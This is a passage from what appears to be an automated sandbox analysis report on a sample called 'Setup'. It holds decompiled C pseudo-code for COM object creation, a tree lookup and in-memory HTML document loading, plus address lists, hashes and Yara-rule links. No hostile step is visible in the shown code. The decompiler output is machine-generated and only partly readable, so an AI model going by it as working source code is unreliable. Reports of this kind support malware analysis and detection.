								_v116 = E0041D530( &_v60);
								 *((intOrPtr*)( *((intOrPtr*)( *_v116 + 0xd0))))(_v116,  &_v96,  &_v80,  &_v80,  &_v80,  &_v80);
								_v8 = 4;
								E00417430( &_v96);
								_v8 = 3;
								E00417430( &_v80);
							}
							_v8 = 0;
							E0040D320();
							L48:
							_v8 = 0xffffffff;
							E0040D320();
							goto L49;
						}
					}
				} else {
					_t189 = 0x80004003;
					L56:
					 *[fs:0x0] = _v16;
					return _t189;
				}
			}

































                                                                                                                                                              0x0040de30
                                                                                                                                                              0x0040de30
                                                                                                                                                              0x0040de30
                                                                                                                                                              0x0040de33
                                                                                                                                                              0x0040de35
                                                                                                                                                              0x0040de40
                                                                                                                                                              0x0040de44
                                                                                                                                                              0x0040de4b
                                                                                                                                                              0x0040de4f
                                                                                                                                                              0x0040de59
                                                                                                                                                              0x0040de68
                                                                                                                                                              0x0040de6e
                                                                                                                                                              0x0040de75
                                                                                                                                                              0x0040de7f
                                                                                                                                                              0x0040de8b
                                                                                                                                                              0x0040dea7
                                                                                                                                                              0x0040deb2
                                                                                                                                                              0x0040deb2
                                                                                                                                                              0x0040dec3
                                                                                                                                                              0x0040e354
                                                                                                                                                              0x0040e354
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e354
                                                                                                                                                              0x0040ded2
                                                                                                                                                              0x0040dede
                                                                                                                                                              0x0040dee3
                                                                                                                                                              0x0040dee3
                                                                                                                                                              0x0040dee7
                                                                                                                                                              0x0040def1
                                                                                                                                                              0x0040df00
                                                                                                                                                              0x0040df20
                                                                                                                                                              0x0040df02
                                                                                                                                                              0x0040df0d
                                                                                                                                                              0x0040df0d
                                                                                                                                                              0x0040df00
                                                                                                                                                              0x0040df26
                                                                                                                                                              0x0040df47
                                                                                                                                                              0x0040df4e
                                                                                                                                                              0x0040df67
                                                                                                                                                              0x0040df67
                                                                                                                                                              0x0040df6a
                                                                                                                                                              0x0040df70
                                                                                                                                                              0x0040df75
                                                                                                                                                              0x0040df7a
                                                                                                                                                              0x0040df80
                                                                                                                                                              0x0040df86
                                                                                                                                                              0x0040df8d
                                                                                                                                                              0x0040dfb5
                                                                                                                                                              0x0040dfb5
                                                                                                                                                              0x0040dfbe
                                                                                                                                                              0x0040e2f9
                                                                                                                                                              0x0040e2fd
                                                                                                                                                              0x0040e319
                                                                                                                                                              0x0040e325
                                                                                                                                                              0x0040e336
                                                                                                                                                              0x0040e33f
                                                                                                                                                              0x0040e34f
                                                                                                                                                              0x0040e34f
                                                                                                                                                              0x0040e33f
                                                                                                                                                              0x0040e325
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040dfdc
                                                                                                                                                              0x0040dfec
                                                                                                                                                              0x0040e010
                                                                                                                                                              0x0040e025
                                                                                                                                                              0x0040e03c
                                                                                                                                                              0x0040dfee
                                                                                                                                                              0x0040dffd
                                                                                                                                                              0x0040dffd
                                                                                                                                                              0x0040e04a
                                                                                                                                                              0x0040e04f
                                                                                                                                                              0x0040e05f
                                                                                                                                                              0x0040e07a
                                                                                                                                                              0x0040e096
                                                                                                                                                              0x0040e0b2
                                                                                                                                                              0x0040e0ce
                                                                                                                                                              0x0040e0ea
                                                                                                                                                              0x0040e106
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e110
                                                                                                                                                              0x0040e118
                                                                                                                                                              0x0040e11c
                                                                                                                                                              0x0040e12b
                                                                                                                                                              0x0040e132
                                                                                                                                                              0x0040e20e
                                                                                                                                                              0x0040e138
                                                                                                                                                              0x0040e13b
                                                                                                                                                              0x0040e140
                                                                                                                                                              0x0040e14e
                                                                                                                                                              0x0040e164
                                                                                                                                                              0x0040e170
                                                                                                                                                              0x0040e181
                                                                                                                                                              0x0040e185
                                                                                                                                                              0x0040e18b
                                                                                                                                                              0x0040e192
                                                                                                                                                              0x0040e197
                                                                                                                                                              0x0040e19c
                                                                                                                                                              0x0040e1a8
                                                                                                                                                              0x0040e1c6
                                                                                                                                                              0x0040e1cd
                                                                                                                                                              0x0040e1d7
                                                                                                                                                              0x0040e1f1
                                                                                                                                                              0x0040e1f1
                                                                                                                                                              0x0040e1f4
                                                                                                                                                              0x0040e1fb
                                                                                                                                                              0x0040e1fb
                                                                                                                                                              0x0040e200
                                                                                                                                                              0x0040e207
                                                                                                                                                              0x0040e207
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e21a
                                                                                                                                                              0x0040e21a
                                                                                                                                                              0x0040e21d
                                                                                                                                                              0x0040e222
                                                                                                                                                              0x0040e22e
                                                                                                                                                              0x0040e24a
                                                                                                                                                              0x0040e256
                                                                                                                                                              0x0040e25f
                                                                                                                                                              0x0040e264
                                                                                                                                                              0x0040e26f
                                                                                                                                                              0x0040e274
                                                                                                                                                              0x0040e280
                                                                                                                                                              0x0040e294
                                                                                                                                                              0x0040e29e
                                                                                                                                                              0x0040e2c4
                                                                                                                                                              0x0040e2c6
                                                                                                                                                              0x0040e2cd
                                                                                                                                                              0x0040e2d2
                                                                                                                                                              0x0040e2d9
                                                                                                                                                              0x0040e2d9
                                                                                                                                                              0x0040e2de
                                                                                                                                                              0x0040e2e5
                                                                                                                                                              0x0040e2ea
                                                                                                                                                              0x0040e2ea
                                                                                                                                                              0x0040e2f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e2f4
                                                                                                                                                              0x0040e05f
                                                                                                                                                              0x0040de5b
                                                                                                                                                              0x0040de5b
                                                                                                                                                              0x0040e357
                                                                                                                                                              0x0040e35a
                                                                                                                                                              0x0040e365
                                                                                                                                                              0x0040e365

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ColorWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4045458706-0
                                                                                                                                                              • Opcode ID: 357680163ede39ea106b7bf8973fb13cc87f1b2c706bd25e2ed9f0712c607f80
                                                                                                                                                              • Instruction ID: a61d8b1859fa99b295e73fed47a3b7f2fdef4b658f642da17756032c367e7847
                                                                                                                                                              • Opcode Fuzzy Hash: 357680163ede39ea106b7bf8973fb13cc87f1b2c706bd25e2ed9f0712c607f80
                                                                                                                                                              • Instruction Fuzzy Hash: 27025E70900108EFDB04DF95C895BEEBBB5EF58304F14816EF815AB2D1DB38AA85CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F0010 Relevance: 10.7, APIs: 7, Instructions: 213COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                              			E004F0010(void* __ebx, signed short* __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, signed short* _a16, intOrPtr _a20) {
				signed short _v8;
				char _v16;
				signed short* _v20;
				signed int _v24;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int _t87;
				signed int _t88;
				signed short* _t91;
				intOrPtr _t104;
				signed short* _t105;
				signed short* _t107;
				signed short* _t113;
				signed short* _t114;
				signed short* _t115;
				signed short* _t116;
				void* _t121;
				intOrPtr _t143;
				void* _t164;
				void* _t165;
				signed int _t166;

				_t165 = __esi;
				_t164 = __edi;
				_t152 = __edx;
				_t121 = __ebx;
				_push(0xffffffff);
				_push(0x505d62);
				_push( *[fs:0x0]);
				_t87 =  *0x561244; // 0xddd124f9
				_t88 = _t87 ^ _t166;
				_v24 = _t88;
				_push(_t88);
				 *[fs:0x0] =  &_v16;
				if(_a12 != 0) {
					 *_a12 = 0;
					_v20 = 0x80004005;
					 *_a16 = 0;
					if(_a4 == 0) {
						L4:
						_t91 = 0;
						goto L32;
					}
					_t152 = _a4;
					if(( *_a4 & 0x0000ffff) != 0) {
						if(( *_a4 & 0x0000ffff) == 0x4d || ( *_a4 & 0x0000ffff) == 0x6d) {
							if((_a4[1] & 0x0000ffff) == 0x53 || (_a4[1] & 0x0000ffff) == 0x73) {
								if((_a4[2] & 0x0000ffff) == 0x48 || (_a4[2] & 0x0000ffff) == 0x68) {
									if((_a4[3] & 0x0000ffff) == 0x54 || (_a4[3] & 0x0000ffff) == 0x74) {
										if((_a4[4] & 0x0000ffff) == 0x4d || (_a4[4] & 0x0000ffff) == 0x6d) {
											if((_a4[5] & 0x0000ffff) == 0x4c || (_a4[5] & 0x0000ffff) == 0x6c) {
												if((_a4[6] & 0x0000ffff) != 0x3a) {
													goto L19;
												} else {
													_t116 = _a12;
													__imp__CoCreateInstance(0x53baf4, 0, 1, _a8, _t116);
													_v20 = _t116;
													_t152 = _a16;
													 *_a16 = 1;
													goto L31;
												}
											} else {
												goto L19;
											}
										} else {
											goto L19;
										}
									} else {
										goto L19;
									}
								} else {
									goto L19;
								}
							} else {
								goto L19;
							}
						} else {
							L19:
							_v56 = E0040B170( &_v52, _a4);
							_v60 = _v56;
							_v8 = 0;
							_v48 = E0040D2B0(_v60, E0041D530(_v60), ":");
							_v8 = 0xffffffff;
							E0043F710(_t101,  &_v52);
							if(_v48 == 0) {
								_t152 = _a4;
								if(E00414FD0(_a4) < 0xff) {
									_t113 = _a4;
									if(( *_t113 & 0x0000ffff) != 0x7b) {
										_t152 = _a4;
										__imp__CLSIDFromProgID(_a4,  &_v40);
										_v20 = _t113;
									} else {
										_t152 =  &_v40;
										_t114 = _a4;
										__imp__CLSIDFromString(_t114,  &_v40);
										_v20 = _t114;
									}
								}
								if(_v20 >= 0) {
									_t104 = _a20;
									__imp__#7(_t104);
									if(_t104 == 0) {
										_t105 = _a12;
										_t152 =  &_v40;
										__imp__CoCreateInstance( &_v40, 0, 1, _a8, _t105);
										_v20 = _t105;
									} else {
										E00414C90();
										_v8 = 1;
										_t107 = E00434050( &_v44);
										__imp__CoGetClassObject( &_v40, 1, 0, 0x53bb14, _t107);
										_v20 = _t107;
										if(_v20 >= 0) {
											_v64 = E0041D530( &_v44);
											_t143 =  *_v64;
											_t152 =  *(_t143 + 0x1c);
											_v20 =  *( *(_t143 + 0x1c))(_v64, 0, 0, _a8, _a20, _a12);
										}
										_v8 = 0xffffffff;
										E0040D320();
									}
								}
							} else {
								_t152 = _a12;
								_t115 = _a8;
								__imp__CoCreateInstance(0x53bb04, 0, 1, _t115, _a12);
								_v20 = _t115;
								 *_a16 = 1;
							}
							L31:
							_t91 = _v20;
							goto L32;
						}
					}
					goto L4;
				} else {
					_t91 = 0x80004003;
					L32:
					 *[fs:0x0] = _v16;
					return E0044F6C8(_t91, _t121, _v24 ^ _t166, _t152, _t164, _t165);
				}
			}





























                                                                                                                                                              0x004f0010
                                                                                                                                                              0x004f0010
                                                                                                                                                              0x004f0010
                                                                                                                                                              0x004f0010
                                                                                                                                                              0x004f0013
                                                                                                                                                              0x004f0015
                                                                                                                                                              0x004f0020
                                                                                                                                                              0x004f0024
                                                                                                                                                              0x004f0029
                                                                                                                                                              0x004f002b
                                                                                                                                                              0x004f002e
                                                                                                                                                              0x004f0032
                                                                                                                                                              0x004f003c
                                                                                                                                                              0x004f004b
                                                                                                                                                              0x004f0051
                                                                                                                                                              0x004f005b
                                                                                                                                                              0x004f0062
                                                                                                                                                              0x004f006e
                                                                                                                                                              0x004f006e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f006e
                                                                                                                                                              0x004f0064
                                                                                                                                                              0x004f006c
                                                                                                                                                              0x004f007e
                                                                                                                                                              0x004f0099
                                                                                                                                                              0x004f00b5
                                                                                                                                                              0x004f00cd
                                                                                                                                                              0x004f00e5
                                                                                                                                                              0x004f00fd
                                                                                                                                                              0x004f0115
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0117
                                                                                                                                                              0x004f0117
                                                                                                                                                              0x004f0128
                                                                                                                                                              0x004f012e
                                                                                                                                                              0x004f0131
                                                                                                                                                              0x004f0134
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0134
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f013c
                                                                                                                                                              0x004f013c
                                                                                                                                                              0x004f0148
                                                                                                                                                              0x004f014e
                                                                                                                                                              0x004f0151
                                                                                                                                                              0x004f016e
                                                                                                                                                              0x004f0171
                                                                                                                                                              0x004f017b
                                                                                                                                                              0x004f0184
                                                                                                                                                              0x004f01ab
                                                                                                                                                              0x004f01bc
                                                                                                                                                              0x004f01be
                                                                                                                                                              0x004f01c7
                                                                                                                                                              0x004f01e0
                                                                                                                                                              0x004f01e4
                                                                                                                                                              0x004f01ea
                                                                                                                                                              0x004f01c9
                                                                                                                                                              0x004f01c9
                                                                                                                                                              0x004f01cd
                                                                                                                                                              0x004f01d1
                                                                                                                                                              0x004f01d7
                                                                                                                                                              0x004f01d7
                                                                                                                                                              0x004f01c7
                                                                                                                                                              0x004f01f1
                                                                                                                                                              0x004f01f7
                                                                                                                                                              0x004f01fb
                                                                                                                                                              0x004f0203
                                                                                                                                                              0x004f0276
                                                                                                                                                              0x004f0282
                                                                                                                                                              0x004f0286
                                                                                                                                                              0x004f028c
                                                                                                                                                              0x004f0205
                                                                                                                                                              0x004f0208
                                                                                                                                                              0x004f020d
                                                                                                                                                              0x004f0217
                                                                                                                                                              0x004f022a
                                                                                                                                                              0x004f0230
                                                                                                                                                              0x004f0237
                                                                                                                                                              0x004f0241
                                                                                                                                                              0x004f025b
                                                                                                                                                              0x004f025d
                                                                                                                                                              0x004f0262
                                                                                                                                                              0x004f0262
                                                                                                                                                              0x004f0265
                                                                                                                                                              0x004f026f
                                                                                                                                                              0x004f026f
                                                                                                                                                              0x004f0203
                                                                                                                                                              0x004f0186
                                                                                                                                                              0x004f0186
                                                                                                                                                              0x004f018a
                                                                                                                                                              0x004f0197
                                                                                                                                                              0x004f019d
                                                                                                                                                              0x004f01a3
                                                                                                                                                              0x004f01a3
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x004f007e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f003e
                                                                                                                                                              0x004f003e
                                                                                                                                                              0x004f0292
                                                                                                                                                              0x004f0295
                                                                                                                                                              0x004f02aa
                                                                                                                                                              0x004f02aa

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ecb187463da72710d10c6f885a97d4b3e33bfb4eb63038d9beb8c17a8b3ad649
                                                                                                                                                              • Instruction ID: 9b2f63963992360146f666215734e55a870c3115d502bbbb8006fdcbe01b2a89
                                                                                                                                                              • Opcode Fuzzy Hash: ecb187463da72710d10c6f885a97d4b3e33bfb4eb63038d9beb8c17a8b3ad649
                                                                                                                                                              • Instruction Fuzzy Hash: 95916E70A00209EFDB14CF94D884BBEB7B1BF88710F50855AF945AB291D7799E81CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0042B000 Relevance: 10.6, APIs: 7, Instructions: 143memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0042B000(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t54;
				char* _t57;
				intOrPtr* _t59;
				char* _t61;
				void* _t67;
				signed char _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				void* _t75;
				char* _t79;
				intOrPtr* _t81;
				void* _t82;
				signed char _t84;
				intOrPtr* _t85;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;

				_v28 = __ecx;
				_v12 =  *((intOrPtr*)(E0041D410(_v28)));
				_t5 = _v28 + 4; // 0x8d000000
				_v16 =  *_t5;
				_t8 = _v28 + 4; // 0x8d000000
				_v24 =  *_t8;
				while(1) {
					_t54 = E0043F400(_v12);
					_t123 = _t122 + 4;
					_t130 =  *_t54;
					if( *_t54 != 0) {
						break;
					}
					_t75 = E00436060(_t130, _v12);
					_t127 = _t123 + 4;
					if((E00420AA0(_v28, _t75, _a8) & 0x000000ff) == 0) {
						_t79 = E0043F400(_v24);
						_t128 = _t127 + 4;
						__eflags =  *_t79;
						if(__eflags != 0) {
							_t82 = E00436060(__eflags, _v12);
							_t128 = _t128 + 4;
							_t84 = E00420AA0(_v28, _a8, _t82);
							__eflags = _t84 & 0x000000ff;
							if((_t84 & 0x000000ff) != 0) {
								_v24 = _v12;
							}
						}
						_v16 = _v12;
						_t81 = E00415110(_v12);
						_t122 = _t128 + 4;
						_v12 =  *_t81;
					} else {
						_t85 = E00441910(_v12);
						_t122 = _t127 + 4;
						_v12 =  *_t85;
					}
				}
				_t57 = E0043F400(_v24);
				_t124 = _t123 + 4;
				__eflags =  *_t57;
				if( *_t57 == 0) {
					_t59 = E00415110(_v24);
					_t124 = _t124 + 4;
					_v32 =  *_t59;
				} else {
					_v32 =  *((intOrPtr*)(E0041D410(_v28)));
				}
				_v12 = _v32;
				while(1) {
					_t61 = E0043F400(_v12);
					_t125 = _t124 + 4;
					__eflags =  *_t61;
					if(__eflags != 0) {
						break;
					}
					_t67 = E00436060(__eflags, _v12);
					_t126 = _t125 + 4;
					_t69 = E00420AA0(_v28, _a8, _t67);
					__eflags = _t69 & 0x000000ff;
					if((_t69 & 0x000000ff) == 0) {
						_t70 = E00441910(_v12);
						_t124 = _t126 + 4;
						_v12 =  *_t70;
					} else {
						_v24 = _v12;
						_t73 = E00415110(_v12);
						_t124 = _t126 + 4;
						_v12 =  *_t73;
					}
				}
				E00445360( &_v8, _v16);
				E00445360( &_v20, _v24);
				E0042BAC0(_a4,  &_v8,  &_v20);
				return _a4;
			}































                                                                                                                                                              0x0042b006
                                                                                                                                                              0x0042b013
                                                                                                                                                              0x0042b019
                                                                                                                                                              0x0042b01c
                                                                                                                                                              0x0042b022
                                                                                                                                                              0x0042b025
                                                                                                                                                              0x0042b028
                                                                                                                                                              0x0042b02c
                                                                                                                                                              0x0042b031
                                                                                                                                                              0x0042b037
                                                                                                                                                              0x0042b039
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042b047
                                                                                                                                                              0x0042b04c
                                                                                                                                                              0x0042b05d
                                                                                                                                                              0x0042b076
                                                                                                                                                              0x0042b07b
                                                                                                                                                              0x0042b081
                                                                                                                                                              0x0042b083
                                                                                                                                                              0x0042b089
                                                                                                                                                              0x0042b08e
                                                                                                                                                              0x0042b099
                                                                                                                                                              0x0042b0a1
                                                                                                                                                              0x0042b0a3
                                                                                                                                                              0x0042b0a8
                                                                                                                                                              0x0042b0a8
                                                                                                                                                              0x0042b0a3
                                                                                                                                                              0x0042b0ae
                                                                                                                                                              0x0042b0b5
                                                                                                                                                              0x0042b0ba
                                                                                                                                                              0x0042b0bf
                                                                                                                                                              0x0042b05f
                                                                                                                                                              0x0042b063
                                                                                                                                                              0x0042b068
                                                                                                                                                              0x0042b06d
                                                                                                                                                              0x0042b06d
                                                                                                                                                              0x0042b0c2
                                                                                                                                                              0x0042b0cb
                                                                                                                                                              0x0042b0d0
                                                                                                                                                              0x0042b0d6
                                                                                                                                                              0x0042b0d8
                                                                                                                                                              0x0042b0ed
                                                                                                                                                              0x0042b0f2
                                                                                                                                                              0x0042b0f7
                                                                                                                                                              0x0042b0da
                                                                                                                                                              0x0042b0e4
                                                                                                                                                              0x0042b0e4
                                                                                                                                                              0x0042b0fd
                                                                                                                                                              0x0042b100
                                                                                                                                                              0x0042b104
                                                                                                                                                              0x0042b109
                                                                                                                                                              0x0042b10f
                                                                                                                                                              0x0042b111
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042b117
                                                                                                                                                              0x0042b11c
                                                                                                                                                              0x0042b127
                                                                                                                                                              0x0042b12f
                                                                                                                                                              0x0042b131
                                                                                                                                                              0x0042b150
                                                                                                                                                              0x0042b155
                                                                                                                                                              0x0042b15a
                                                                                                                                                              0x0042b133
                                                                                                                                                              0x0042b136
                                                                                                                                                              0x0042b13d
                                                                                                                                                              0x0042b142
                                                                                                                                                              0x0042b147
                                                                                                                                                              0x0042b147
                                                                                                                                                              0x0042b15d
                                                                                                                                                              0x0042b166
                                                                                                                                                              0x0042b172
                                                                                                                                                              0x0042b182
                                                                                                                                                              0x0042b18d

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initstd::_$AllocatorDebugHandleHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1086691941-0
                                                                                                                                                              • Opcode ID: 8613851bc92e564e5fd89ba30e18dc51bef5a2a00dcac82af72841c2c8a2928c
                                                                                                                                                              • Instruction ID: 371b7a6077a189e9ec205100506d58bfa18af8a1200fd1b3e5c5e8761ebd3e21
                                                                                                                                                              • Opcode Fuzzy Hash: 8613851bc92e564e5fd89ba30e18dc51bef5a2a00dcac82af72841c2c8a2928c
                                                                                                                                                              • Instruction Fuzzy Hash: F85183F9E00119AFDB04DF95D8928BFBBB4EF58304F54806EE506A7312D738AA41CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004CC8C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 133COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E004CC8C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				signed int _t60;
				void* _t63;
				intOrPtr _t66;
				intOrPtr _t71;
				signed int _t117;

				_push(0xffffffff);
				_push(0x5118d6);
				_push( *[fs:0x0]);
				_t60 =  *0x561244; // 0xddd124f9
				_push(_t60 ^ _t117);
				 *[fs:0x0] =  &_v16;
				_t63 = E00414C90();
				_v8 = 0;
				if(_a12 != 0) {
					if(_a4 == 0 || _a8 == 0) {
						_push(L" LoadMemory mem == NULL ");
						E004CC5C0(_t63);
						_v44 = 0x80070057;
						_v8 = 0xffffffff;
						E0040D320();
						_t66 = _v44;
					} else {
						_v28 = GlobalAlloc(0x40, _a8 + 2);
						if(_v28 != 0) {
							_t71 = E0044FCB0(__ebx, __edi, __esi, _v28, _a4, _a8);
							__imp__CreateStreamOnHGlobal(_v28, 1,  &_v24);
							_v20 = _t71;
							if(_v20 != 0) {
								L14:
								_v56 = 0x80004005;
								_v8 = 0xffffffff;
								E0040D320();
								_t66 = _v56;
							} else {
								E004300C0(_a12);
								_v8 = 1;
								if(E0041D530( &_v32) == 0) {
									L13:
									_v8 = 0;
									E00439240();
									goto L14;
								} else {
									E00430540( &_v36);
									if(_v36 == 0) {
										goto L13;
									} else {
										E0042FC90(_v36, E0041D530( &_v24));
										_v60 = E0041D530( &_v32);
										_t105 = _v60;
										_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x14))))(_v60, 0, _v36, 0, 0);
										if(_v20 != 0) {
											E004CC870(_t105, 1);
										}
										_v52 = _v20;
										_v8 = 0;
										E00439240();
										_v8 = 0xffffffff;
										E0040D320();
										_t66 = _v52;
									}
								}
							}
						} else {
							_v48 = 0x8007000e;
							_v8 = 0xffffffff;
							E0040D320();
							_t66 = _v48;
						}
					}
				} else {
					_push(L" LoadMemory pDoc == NULL ");
					E004CC5C0(_t63);
					_v40 = 0x80070057;
					_v8 = 0xffffffff;
					E0040D320();
					_t66 = _v40;
				}
				 *[fs:0x0] = _v16;
				return _t66;
			}





















                                                                                                                                                              0x004cc8c3
                                                                                                                                                              0x004cc8c5
                                                                                                                                                              0x004cc8d0
                                                                                                                                                              0x004cc8d4
                                                                                                                                                              0x004cc8db
                                                                                                                                                              0x004cc8df
                                                                                                                                                              0x004cc8e8
                                                                                                                                                              0x004cc8ed
                                                                                                                                                              0x004cc8f8
                                                                                                                                                              0x004cc929
                                                                                                                                                              0x004cc931
                                                                                                                                                              0x004cc936
                                                                                                                                                              0x004cc93e
                                                                                                                                                              0x004cc945
                                                                                                                                                              0x004cc94f
                                                                                                                                                              0x004cc954
                                                                                                                                                              0x004cc95c
                                                                                                                                                              0x004cc96b
                                                                                                                                                              0x004cc972
                                                                                                                                                              0x004cc99e
                                                                                                                                                              0x004cc9b0
                                                                                                                                                              0x004cc9b6
                                                                                                                                                              0x004cc9bd
                                                                                                                                                              0x004cca67
                                                                                                                                                              0x004cca67
                                                                                                                                                              0x004cca6e
                                                                                                                                                              0x004cca78
                                                                                                                                                              0x004cca7d
                                                                                                                                                              0x004cc9c3
                                                                                                                                                              0x004cc9ca
                                                                                                                                                              0x004cc9cf
                                                                                                                                                              0x004cc9dd
                                                                                                                                                              0x004cca5b
                                                                                                                                                              0x004cca5b
                                                                                                                                                              0x004cca62
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004cc9df
                                                                                                                                                              0x004cc9e3
                                                                                                                                                              0x004cc9ec
                                                                                                                                                              0x00000000
